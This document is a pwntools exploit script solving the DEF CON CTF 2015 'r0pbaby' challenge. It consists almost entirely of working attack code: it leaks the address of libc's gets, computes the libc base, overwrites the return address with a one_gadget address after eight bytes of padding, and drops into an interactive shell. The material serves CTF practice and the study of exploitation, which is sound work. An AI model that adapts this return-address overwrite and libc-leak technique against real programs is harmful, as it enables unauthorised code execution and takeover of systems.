Defcon CTF 2015 r0pbaby

exploit.py

from pwn import *
  
p = process('./ropbaby')
e = ELF('./ropbaby')
libc = e.libc

pop_rdi_offset = 0x000000000002155f
gets_offset = libc.symbols['gets']
one_offset = [0x4f2c5, 0x4f322, 0x10a38c]

p.sendlineafter(': ', '2')
p.sendlineafter(': ', 'gets')
gets_addr = int(p.recvline().split(' ')[2], 16)

libc_base = gets_addr - gets_offset
one_addr = libc_base + one_offset[0]

payload = 'A' * 8
payload += p64(one_addr)


p.sendlineafter(': ', '3')
p.sendlineafter(': ', str(len(payload)+1))
p.sendline(payload)

p.sendlineafter(': ', '4')
p.interactive()